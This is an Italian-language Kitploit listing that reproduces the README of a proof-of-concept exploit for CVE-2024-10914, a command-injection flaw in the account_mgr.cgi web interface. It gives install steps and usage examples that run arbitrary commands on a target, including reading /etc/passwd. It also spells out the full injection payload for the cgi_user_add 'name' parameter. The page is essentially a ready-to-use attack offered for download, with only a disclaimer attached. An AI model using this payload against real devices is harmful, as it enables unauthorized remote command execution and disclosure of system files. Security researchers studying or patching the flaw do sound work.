Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-10914__POC — PoC per sfruttare il CVE-2024-10914 | Kitploit
Strumenti/GitHubGitHub/0xss3k/cve-2024-10914__poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e Formazione
GitHub0xss3k/cve-2024-10914__poc

CVE-2024-10914__POC

PoC per sfruttare il CVE-2024-10914

Vedi Repository
32 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-10914 - Proof of Concept

Exploit per vulnerabilità di iniezione di comandi nell'endpoint /cgi-bin/account_mgr.cgi. Questa vulnerabilità permette di eseguire comandi arbitrari sul sistema affetto attraverso parametri non sanitizzati.

Descrizione della Vulnerabilità

CVE-2024-10914 è una vulnerabilità di iniezione di comandi che colpisce dispositivi con interfaccia web CGI. L'applicazione vulnerabile non convalida correttamente il parametro name nella richiesta cgi_user_add, permettendo a un attaccante di iniettare comandi di sistema che verranno eseguiti con i privilegi dell'applicazione.

Requisiti

  • Python 3.7+
  • libreria requests

Installazione

Clona il repository e installa le dipendenze:

root@kitploit:~
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt

Oppure installa manualmente:

root@kitploit:~
pip install requests
Scarica lo strumento

Utilizzo

Lo script fornisce due argomenti:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>

Parametri

  • -u, --url (richiesto): URL del bersaglio (esempio: http://192.168.1.1)
  • -c, --command (opzionale): Comando da eseguire (default: id)

Esempi

Eseguire il comando id:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1

Eseguire un comando personalizzato:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"

Elencare i file:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"

Funzionamento Tecnico

L'exploit invia una richiesta GET all'endpoint vulnerabile con il seguente payload:

root@kitploit:~
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "

La stringa vuota viene chiusa con virgolette e si inietta il comando desiderato, che viene eseguito nel contesto del server.

Risposta

Lo script mostrerà:

  • Stato della connessione
  • Payload inviato
  • Codice di stato HTTP
  • Risposta completa del server

Avviso Legale

Questo codice è fornito esclusivamente a scopo educativo e di ricerca sulla sicurezza. Deve essere utilizzato solo su sistemi di cui si possiede esplicita autorizzazione. L'uso non autorizzato di questo exploit può violare leggi locali e costituire reato. L'autore non si assume responsabilità per l'uso improprio di questo strumento.

Riferimenti

  • CVE-2024-10914
  • Punteggio CVSS: Da definire

Autore

SS3K

Licenza

Non specificata